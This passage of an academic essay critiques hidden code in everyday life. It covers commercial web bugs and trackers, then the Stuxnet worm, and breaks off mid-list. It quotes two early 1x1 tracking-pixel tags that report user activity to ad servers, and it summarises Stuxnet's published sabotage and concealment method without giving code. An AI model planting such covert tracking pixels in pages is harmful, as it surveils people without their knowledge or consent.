The deeply interactive characteristic of code and software makes computational media highly plastic for use in everyday life, and as such it has been highly successful in penetrating more and more into the lifeworld. Digital code/software has created, and continues to create, specific tensions in relation to old media forms, such as the disruption it has produced in the print, music and film industries, as well as problems for managing and spectacularising the relations of the public to the entertainment industry and politics. This is something that relates to the interests of the previous century’s critical theorists, particularly their concern with the liquidation of individuality and the homogenization of culture. Nonetheless, there is also held to be a radical, if not revolutionary kernel within the softwarization project. It is a potential that is understood as relating to the relative affordance code/software appears to provide for autonomous individuals within networks of association to share information and communicate, often theorised as a form of network politics. Indeed, as Deuze ''et al ''have argued:&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Considering the current opportunity a media life gives people to create multiple versions of themselves and others, and to endlessly redact themselves (as someone does with his/her profile on an online dating site in order to produce better matches), we now have entered a time where… we can in fact see ourselves live, become cognizant about how our lifeworld is 'a world of artifice, of bending, adapting, of fiction, vanity, a world that has meaning and value only for the man who is its deviser' [Pirandello 1990,&amp;amp;nbsp;39]. But this is not an atomized, fragmented, and depressing world, or it does not have to be such a world. (Deuze, Blank, and Speers, 2012)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
I want to understand the ecology in computational ecology here as a broad concept related to the environmental habitus of both human and non-human actors. My aim in doing so is to explore changes that are made possible by the installation of code/software via computational devices, streams, clouds, or networks. This is what Mitcham calls a ‘new ecology of artifice’ (1998: 43). The proliferation of contrivances that are computationally based is truly breathtaking - each year we are provided with fresh statistics that demonstrate just how profound the new computational world is, for example, 427 million Europeans (or 65 percent) use the Internet and more than 9 in 10 European Internet users reading news online (Wauters, 2012). These computationally based devices, of course, are not static, nor are they mute, and their interconnections, communications, operation, effects and usage remain to be properly studied. It is a task that is made all the more difficult: both by the staggering rate of change, thanks to the underlying hardware technologies, which are becoming ever smaller, more compact, more powerful and less power-hungry; and by the increasing complexity, power, range and intelligence of the software that powers it.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; These computational devices, particularly mobile forms, also enable the assemblage of the new social ontologies and the corresponding social epistemologies that we have increasingly come to take for granted in computational society, including Wikipedia, Facebook, and Twitter. The extent to which computational devices, and the computational principles on which they are based and from which they draw their power, have permeated the way we use and develop knowledges in everyday life continues to expand driven by the network effects of digital media, if we had not already discounted and backgrounded its importance. The ability to call up information instantly from a mobile device, combine it with others, subject it to debate and critique through real-time social networks, and then edit, post and distribute it worldwide would be incredible if it hadn’t become so mundane (see, for example, Hall, 2011).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Today it should hardly come as a surprise that code/software lies as a mediator between ourselves and our corporeal experiences. Code/software are the materialisation of computationality, in that they are the medium through which structural features of computation&amp;amp;nbsp;are realised and mediated. For example, code/software disconnects the physical world from a direct coupling with our physicality, whilst managing a looser softwarized transmission system (see also Parikka, 2012). Called ‘fly-by-wire’ in aircraft design, in reality fly-by-wire is the condition of the computational environment we increasingly experience, and I elsewhere term ''computationality'' (Berry, 2011). This is a highly mediated existence and has been a growing feature of the (post) modern world. Whilst many objects remain firmly material and within our grasp, it is easy to see how a more softwarized simulacra lies just beyond the horizon. Not that software isn’t material, of course. Certainly, it is embedded in physical objects and the physical environment and requires a material carrier to function at all. Nonetheless, the materiality of software is without a doubt ''differently'' material, more ''tenuously'' material, almost less ''materially material''. 
That is, the material form of code/software is difficult to theorise and understand due to its perceived invisibility or ethereality, yet nonetheless having concrete effects. This is partly, it has to be said, due to software’s increasing tendency to hide its depths behind glass rectangular squares which yield only to certain prescribed forms of touch-based interfaces. Here I am thinking both of physical keyboards and trackpads, as much as haptic touch interfaces, like those found in the iPad and other tablet computers. Another way of putting this, as N. Katherine Hayles (2004) has accurately observed, is that print is flat and code is deep. Although it is useful to note that theorists, such as Frabetti (2010), problematise Hayles' understanding of code, print, and materiality.&amp;lt;br&amp;gt;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Web Bugs, Beacons, and Trackers'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Some examples will help to demonstrate how this code-based world is increasingly being spun around us. Firstly, we might consider the growing phenomena of what are called ‘web bugs’ (also known as ‘web beacons’); that is, computer programming code that is embedded in seemingly benign surfaces, but which is actively and covertly collecting data and information about us.[1] As Madrigal explains: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;This morning, if you opened your browser and went to NYTimes.com, an amazing thing happened in the milliseconds between your click and when the news about North Korea and James Murdoch appeared on your screen. Data from this single visit was sent to 10 different companies, including Microsoft and Google subsidiaries, a gaggle of traffic-logging sites, and other, smaller ad firms. Nearly instantaneously, these companies can log your visit, place ads tailored for your eyes specifically, and add to the ever-growing online file about you… the list of companies that tracked my movements on the Internet in one recent 36-hour period of standard web surfing: Acerno. Adara Media. Adblade. Adbrite. ADC Onion. Adchemy. ADiFY. AdMeld. Adtech. Aggregate Knowledge. AlmondNet. Aperture. AppNexus. Atlas. Audience Science… And that's just the As. My complete list includes 105 companies, and there are dozens more than that in existence. (Madrigal, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs are automated data collection agents that are secretly included in the web pages that we browse. Often held within a tiny one-pixel frame or image, which is therefore far too small for the naked eye to see, they execute code to secrete cookies onto your computer so that they can track user behavior, and send various information about the user back to their servers.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Originally designed as ‘HTTP state management mechanisms’ in the early 1990s, these data storage processes were designed to enable webpages and sites to store the current collection of data about a user, or what is called ‘State’ in computer science. Known as ‘web bugs for web 1.0’ (Dobias, 2010: 245), they were aimed at allowing website designers to implement some element of memory about a user, such as a current shopping basket, preferences, or username. It was a small step for companies to see the potential of monitoring user behaviour by leaving tracking information about browsing, purchasing and clicking behaviour through the use of these early ‘cookies’.[2] The ability of algorithms to track behaviour, and collect data and information about users raises important privacy implications, but it also facilitates the rise of so-called behaviour marketing and nudges (for a behaviourist approach see Eyal, 2012). These technologies have become much more sophisticated in the light of Web 2.0 technologies and developments in hardware and software: in effect, web bugs for web 2.0 (Dobias, 2010: 245).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Fortunately, we are seeing the creation of a number of useful software projects to allow us to track the trackers: Collusion, Foxtracks and Ghostery, for example.[3] If we look at the Ghostery log for the [http://chartbeat.com/ ChartBeat company] it is described as:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Provid[ing] real-time analytics to web sites and blogs. The interface tracks visitors, load times, and referring sites on a minute-by-minute basis. This allows real-time engagement with users giving publishers an opportunity to respond to social media events as they happen. ChartBeat also supports mobile technology through APIs. (Ghostery, 2012b)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs perform these analytics by running code run in the browser without the knowledge of the user, which if it should be observed, looks extremely complicated.[4] Here are two early web bugs (web 1.0) collected by the Electronic Frontier Foundation (EFF) (1999):&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;&lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;img src=&amp;quot;(http://ad.doubleclick.net/ad/pixel.quicken/NEW)&amp;quot; width=1 height=1 border=0&amp;amp;gt;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;IMG WIDTH=1 HEIGHT=1 border=0 SRC=&amp;quot;(http://media.preferences.com/ping?&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;ML_SD=IntuitTE_Intuit_1x1_RunOfSite_Any) &amp;amp;amp;db_afcr=4B31-C2FB-10E2C&amp;amp;amp;event=reghome&amp;amp;amp;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;group=register&amp;amp;amp; time=1999.10.27.20.5 6.37&amp;quot;&amp;amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;amp;nbsp;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Later web bugs (web 2.0) are not included here due to the complexity and length of the code (but see the 3rd-party elements, or ‘3pes’, at http://www.knowyourelements.com/ ).[5] It is noticeable that this code is extremely opaque and difficult to understand, even for experienced computer programmers. Indeed, one suspects an element of obfuscation, a programming technique to reduce the readability of the code in order to shield the company from observation. So far, in checking a number of web bugs on a variety of websites, I have been unable to find one that supplies any commentary on what exactly the code is doing, beyond a short privacy policy statement. Again Ghostery (2012b) usefully supplies us with some general information on the web bug, such as the fact that it has been found on over 100,000 websites across the Internet, and that the data collected is 'anonymous (browser type), pseudonymous (IP address)', the data is not shared with third parties but no information is given on their data retention policies. As of 2nd March, 2012, Ghostery reported that it was tracking 829 different web bugs across the Internet. This is a relatively unregulated market in user behavior, tracking and data collection, which currently has a number of self-regulatory bodies, such as the Network Advertising Initative (NAI). As Madrigal reports: 'In essence, [the NAI] argued that users do not have the right to *not* be tracked. &amp;quot;We've long recognized that consumers should be provided a choice about whether data about their likely interests can be used to make their ads more relevant,&amp;quot; [they] wrote. &amp;quot;But the NAI code also recognizes that companies sometimes need to continue to collect data for operational reasons that are separate from ad targeting based on a user's online behavior.&amp;quot;… Companies &amp;quot;need to continue to collect data,&amp;quot; but that contrasts directly with users desire &amp;quot;not to be tracked.&amp;quot;' (Madrigal, 2012).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; These web bugs, beacons, pixels, and tags, as they are variously called, form part of the dark-net surveillance network that users rarely see, even though it is profoundly changing their experience of the internet in real-time by attempting to second guess, tempt, direct and nudge behavior in particular directions (see Parry, 2011). Ghostery ranked the web bugs in 2010 and identified the following as the most frequently encountered (above average): Revenue Science (250x), OpenX (254x), AddThis (523.6x), Facebook Connect (529.8x), Omniture (605.7x), Comscore Beacon (659.5x), DoubleClick (924.4x), QuantCast (1042x), Google Adsense (1452x), Google Analytics (3904.5x) (Ghostery, 2011). As can be seen in terms of relative size of encounter, Google is clearly the biggest player by a long distance in the area of user statistics collection. This data is important because, as JP Morgan's Imran Khan explained, a unique visitor to each website at [http://www.businessinsider.com/blackboard/amazon Amazon] (e-commerce) is generating $189 per user, at [http://www.businessinsider.com/blackboard/google Google] (search) it is generating $24 per user, and although Facebook (social networking) is only generating $4 per user, this is a rapidly growing number (Yarrow, 2011).&amp;amp;nbsp; Keeping and holding these visitors, through real-time analytics, customer history, behavioural targeting, etc. is increasingly becomong extremely profitable. 
Ghostery (2010) has performed a useful analysis of their web bug database that attempts to categorise the web bugs found into 16 different types, which I have re-categorised into five main types: (1) Advertiser/Marketing Services, (2) Analysis/Research Services, (3) Management Platforms, (4) Verification/Privacy Services:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
1. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Advertiser/Marketing Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Advertiser: A company sponsoring advertisement and ultimately responsible for the message delivered to the consumer. Example: [http://www.att.com/ AT&amp;amp;amp;T] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Exchange: A provider of marketplace connecting advertisers to ad networks and data aggregators (online and off), often facilitating multiple connections and bidding processes. Example: [http://www.rightmedia.com/ Right Media]&amp;amp;nbsp; &amp;amp;nbsp; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Network: A broker and often technology provider connecting advertisers and publishers. (web site operators) Example: [http://www.burstmedia.com/ Burst Media] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Publisher: Website operator who displays ads for advertiser(s) in various types of campaigns. Example: [http://www.nytimes.com/ The New York Times]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
2. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Analysis/Research Services''': &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Data Aggregator: Collects data from online publishers and provides it to advertisers either directly or via exchange. Example: [http://www.bluekai.com/ BlueKai] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Offline Data Aggregator: Collects data from a range of offline sources and provides data to advertisers directly or via exchange. [http://www.experian.com/ Experian] &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Optimizer: Provider of analytics technology and services for ROI assessment and content optimization purposes. Example: [http://www.roilabs.com/ ROILabs] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Research: Collects data for market research purposes where no ads are serviced through this data. Example: Example: [http://www.safecount.net/ Safecount] &lt;br /&gt;
*e.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Analytics Provider: Provider of cross-platform statistical analysis to understand market effectiveness and audience segmentation. Example: [http://www.google.com/analytics/ Google Analytics] &lt;br /&gt;
*f.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Retargeter: Providers of technologies that allow publishers to identify their visitor when they place ads on third party sites. Example: [http://www.fetchback.com/ Fetchback]&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
3. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Management Platforms''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Demand-Side Platform: A technology provider that allows marketers to buy inventory across multiple platforms or exchanges. DSPs often layer in custom optimization, audience targeting, real-time bidding and other services. Example: [http://www.invitemedia.com/ Invite Media] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Supply-Side Platform: A technology provider that allows publishers to access advertiser demand across multiple platforms or exchanges.&amp;amp;nbsp; SSPs often layer in custom yield optimization, audience creation, real-time bidding and other services. Example: [http://www.admeld.com/ AdMeld] &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Server: Technology that delivers and tracks advertisements independently of the web site where the ad is being displayed. Example: [http://www.doubleclick.com/ DoubleClick DART] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Agency: Provider of creative and buying services (both audience and data) for advertisers. Example: [http://www.mediacom.com/en/home.aspx MediaCom]&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
4. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Verification/Privacy Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Verification: Certifies or classifies webpages in an effort to prevent advertisers’ campaigns from running on unsavory or blocked content, and/or protects advertisers from having other companies run their ads incorrectly. &amp;amp;nbsp;Example: [http://www.clickforensics.com/ ClickForensics] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Privacy: Technology providers that deliver information and transparency to consumers on how 3rd party companies gather and use their data. Example: [http://www.betteradvertising.com/ Better Advertising]&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:LUMAadvertising.jpg|left|500x450px|Image 1: Display Advertising Technology Landscape (Luma, 2012)]] ''Image 1: Display Advertising Technology Landscape (Luma, 2012)''&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &amp;lt;br&amp;gt; Ghostery gives a useful explanation of how these companies interoperate to perform a variety of services for advertising and marketing clients: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;A company like [http://www.turn.com/ Turn Media] is a technology provider that allows marketers to buy inventory across multiple platforms or exchanges, or a Demand-Side Platform. They provide services for marketers and agencies to centrally manage buying, planning, targeting, and optimizing media opportunities. Reasonably speaking, however, you could also technically classify them as an Optimizer because this process is included under the umbrella of the platform. Turn [Media] is deeply data driven and partners with multiple data providers including [http://www.bluekai.com/ BlueKai], [http://www.targusinfo.com/ TargusInfo], [http://www.exelate.com/new/index.html eXelate], and others (Ghostery, 2010). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Of course, one element missing from this typology is that of surveillance, and indeed it is no surprise that web bugs perform part of the tracking technologies used by companies to monitor staff. For example, in 2006 Hewlett Packard used web bugs from [http://readnotify.com/ readnotify.com] to trace insider leaks to the journalist Dawn Kawamoto and later confirmed in testimony to a U.S. House of Representatives subcommittee that it's ‘still company practice to use e-mail bugs in certain cases’ (Evers, 2006; Fried, 2006).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; As can be seen, this is an extremely textured environment that currently offers little in terms of diagnosis or even warnings to the user. The industry itself, which prefers the term “clear GIF” to web bug, is certainly keen to avoid regulation and keeps itself very much to itself in order to avoid raising too much unwarranted attention. Some of the current discussions over the direction of regulation on this issue have focused on the “do not track” flag, which would signal a user's opt-out preference within an HTTP header. Unfortunately, very few companies respect the &amp;quot;do not track&amp;quot; header and there is currently no legal requirement that they do so in the US, or elsewhere (W3C, 2012). Although one can see in this context the current debate over the EU ePrivacy Directive, where the Article 29 Working Party (A29 WP) has stated that ‘voluntary plans drawn up by Europe's digital advertising industry representatives, the European Advertising Standards Alliance (EASA) and IAB Europe, do not meet the consent and information requirements of the recently revised ePrivacy Directive’ (Baker, 2012).&amp;amp;nbsp; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; One of the newer, and perhaps indicative directions of travel of these new web bugs under development is called [http://www.persianstat.ir/ PersianStat], which claims to keep 'an eye on 1091622 websites': an Iranian web tracking and data analytics website, it shows that this new code ecology is not purely a Western phenomenon. With the greater use of computational networked devices in everyday life, from mobile phones to GPS systems, these forms of tracking systems will only become more invasive and aggressive in collecting data from our everyday life and encounters. Indeed, it is unsurprising to find that Americans, for example, are not comfortable with the growth in use of these tracker technologies. Pew (2012) found:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;that 73 percent of&amp;amp;nbsp;Americans said they would 'not be okay' with&amp;amp;nbsp;being tracked (because it would be an invasion&amp;amp;nbsp;of privacy)… Only 23 percent said they'd be 'okay' with&amp;amp;nbsp;tracking (because it would lead to better and&amp;amp;nbsp;more personalized search results)…Despite all those high-percentage objections&amp;amp;nbsp;to the idea of being tracked, less than half of&amp;amp;nbsp;the people surveyed -- 38 percent -- said they&amp;amp;nbsp;knew of ways to control the data collected&amp;amp;nbsp;about them. (Garber, 2012; Pew, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This contradiction between the ability of these computational systems and surfaces to supply a commodity to the user, and the need to raise income through the harvesting of data which is in turn sold to advertisers and marketing companies, shows that this is an unstable situation. It also serves to demonstrate the extent&amp;amp;nbsp;to which users are just not aware of the subterranean depths of their computational devices and the ability&amp;amp;nbsp;of these general computing platforms to disconnect the user interface from the actual intentions or functioning of the device, whilst giving the impression to the user that they remain fully in control of the computer. As Garber observes, ‘underground network, surface illusion… How much do we actually want to know about this stuff? Do we truly want to understand the intricacies of data-collection and personalization and all the behind-the-screen work that creates the easy, breezy experience of search ... or would we, on some level, prefer that it remain as magic?’ (Garber, 2012). An issue helpfully illustrated by the next case study of the Stuxnet virus, which shows the extent to which the magic of software can conceal its true function.&amp;lt;br&amp;gt;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Stuxnet'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Stuxnet[6] is a computer worm which experts now believe was aimed at the Iranian uranium-enrichment facility at Natanz, Iran.[7] The Stuxnet worm, a subclass of computer virus, copied itself repeatedly across computer systems until it found the host that met its ‘strike conditions’, that is, the location it was designed to attack, and activated its ‘digital warhead’, which may monitor, damage, or even destroy its target. The name, ‘Stuxnet,’ is ‘derived from some of the filename/strings in the malware - mrxcls.sys, mrxnet.sys’, the first part, 'stu', comes from the (.stub) file, mrxcls.sys; the second part, 'xnet', comes from mrxnet.sys (Kruszelnicki, 2011; mmpc2, 2010). Due to the sophistication of the programming involved, this worm is considered to have reached a new level in cyberwarfare. Stuxnet has been called the first 'weaponized' computer virus, and it would have required huge resources, like a test facility to model a nuclear plant, to create and launch it (Cherry, 2010). As Liam O Murchu, an operations manager for Symantec, explained:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Unlike the millions of worms and viruses that turn up on the Internet every year, this one was not trying to steal passwords, identities or money. Stuxnet appeared to be crawling around the world, computer by computer, looking for some sort of industrial operation that was using a specific piece of equipment, a Siemens S7-300 programmable logic controller. (60 Minutes, 2012b)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
The Stuxnet worm works by undertaking a very complex stealth infection and covers its tracks by recording data from the nuclear processing system which it then plays back to the operators to disguise that it is actually gently causing the centifuges to fail. This is known as a ‘man-in-the-middle attack’ because it fakes industrial process control sensor signals so an infected system does not exhibit abnormal behavior and therefore raise alarm. Again, cleverly, the faults it creates in the plant are likely to occur weeks after the sabotaged effort, and in a targeted way, through the fatiguing of the motors – this looks like a standard failure rather than an attack. Indeed, Iran later confirmed that a number of its centrifuges had been affected by an attack (CBS News, 2010).&amp;amp;nbsp;A ‘senior Iranian intelligence official said an estimated 16,000 computers were infected by the Stuxnet virus’ (Assocated Press, 2012). The Stuxnet worm is also interesting because it has built-in ''sunset code'' that causes the worm to erase itself after 24 June, 2012, and hence hide its tracks. As Zetter explains:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;once the code infects a system, it searches for the presence of two kinds of frequency converters made by the Iranian firm Fararo Paya and the Finnish company Vacon, making it clear that the code has a precise target in its sights… Stuxnet begins with a nominal frequency of 1,064 Hz… then reduces the frequency for a short while before returning it back to 1,064 Hz… Stuxnet [then] instructs the speed to increase to 1,410 Hz, which is 'very close to the maximum speed the spinning aluminum IR-1 rotor can withstand mechanically',… [but] before the rotor reaches the tangential speed at which it would break apart… within 15 minutes after instructing the frequency to increase, Stuxnet returns the frequency to its nominal 1,064 Hz level. Nothing else happens for 27 days, at which point a second attack sequence kicks in that reduces the frequency to 2 Hz, which lasts for 50 minutes before the frequency is restored to 1,064 Hz. Another 27 days pass, and the first attack sequence launches again, increasing the frequency to 1,410 Hz, followed 27 days later by a reduction to 2 Hz. (Zetter, 2011)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Stuxnet disguises all of this activity by overriding the data control systems and sending commands to disable warning and safety controls that would normally alert plant operators to these dangerous frequency changes. Stuxnet is intriguing because it is not a general purpose attack, but designed to unload its digital warheads under specific conditions against a specific threat target. It is also remarkable in the way in which it disengages the interface, the screen for the user, from the underlying logic and performance of the machine.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Indeed, there has been a great deal of speculation about whether a state would have been required to develop it due to the complexities involved in being able to test such a worm before releasing it into the wild (Markoff and Sanger, 2010). Richard Clarke, the former chief of counter-terrorism under Presidents Clinton and Bush, argues that the built-in fail-safes are an important clue to Stuxnet’s source and that they point to the kinds of procedures found in a Western government. He says, ‘If a [Western] government were going to do something like this…then it would have to go through a bureaucracy, a clearance process, [and] somewhere along the line, lawyers would say, “We have to prevent collateral damage,” and the programmers would go back and add features that normally you don’t see in the hacks. And there are several of them in Stuxnet’ (Gross, 2011). Indeed, the complexities and structure of the worm are such that at least thirty people would have been working on it simultaneously in order to build a worm of this kind (Zetter, 2010). This is especially true of a worm that launched a so-called ‘zero-day attack’, that is, using a set of techniques that are not public nor known by the developer of the attacked system, in this case Microsoft and Siemens. In actuality it was remarkable for exploiting four different zero-day vulnerabilities (Gross, 2011). Because of the layered approach to its attack and the detailed knowledge required of Microsoft Windows, SCADA (Supervisory Control And Data Acquisition) and PLCs (Programmable Logic Controllers) systems, this would have been a very large project to develop and launch. Indeed, Eric Byres, chief technology officer for Byres Security, has stated: ‘we’re talking man-months, if not years, of coding to make it work the way it did' (quoted in Zetter, 2010).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The two chief capabilities of Stuxnet are: (1) to identify its target precisely using a number of software based markers that give the physical identity of the location away. Indeed, ‘attackers [had] full, and I mean this literally, full tactical knowledge of every damn detail of [the Natanz] plant’ (60 Minutes, 2012b); and (2) the capability to disengage control systems from physical systems and to provide a stealth infection into the computer system that would fool the operators of the plant (also known as a ‘man-in-the-middle attack’). This was achieved through the use of two ‘digital warheads’, called 417 and 315. The smaller, 315, was designed to slowly reduce the speed of rotors leading to cracks and failures, and the second larger warhead, 417, manipulated valves in the centrifuge and faking industrial process control sensor signals by modeling the centifuges which were grouped into 164 cascades (Langner, 2011). Indeed, Langner (2011) described this evocatively as ‘two shooters from different angles’. 
The Stuxnet worm was launched some time in 2009/2010 and shortly afterwards:[8]&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;the all-important centrifuges at Iran's nuclear fuel enrichment facility at Natanz began failing at a suspicious rate. Iran eventually admitted that computer code created problems for their centrifuges, but downplayed any lasting damage. Computer security experts now agree that code was a sophisticated computer worm dubbed Stuxnet, and that it destroyed more than 1,000 centrifuges. (60 Minutes, 2012a)&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
The origin of the name Stuxnet is hypothesized from an analysis of the approximately 15,000 lines of programming code. The analysis performed by Langner (2011) and others, was a close reading and reconstruction of the programming logic by taking the machine code, disassembling it and then attempting to convert it into the C programming language. The code could then be analysed for system function calls, timers, and data structures, in order to try to understand what the code was doing (Langner, 2011). Indeed, as part of this process a reference to 'Myrtus' was discovered, and the link made to 'Myrtus as an allusion to the Hebrew word for Esther. The Book of Esther tells the story of a Persian plot against the Jews, who attacked their enemies pre-emptively' (Markoff and Sanger, 2010).[9] Whilst no actor has claimed responsibility for Stuxnet, there is a strong suspicion that either the United States or Israel had to be involved in the creation of such a sophisticated attack virus (see Sanger, 2012). Its attack appears to have been concentrated on a number of selected areas, with Iran at the centre (see table 1).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;amp;nbsp;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
  [[Image:BerryStuxnet.jpg|left|500x450px|Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.)]] &lt;br /&gt;
&lt;br /&gt;
**Iran -&amp;amp;nbsp;52.2% &lt;br /&gt;
**Indonesia -&amp;amp;nbsp;17.4% &lt;br /&gt;
**India -&amp;amp;nbsp;11.3% &lt;br /&gt;
**Pakistan -&amp;amp;nbsp;3.6% &lt;br /&gt;
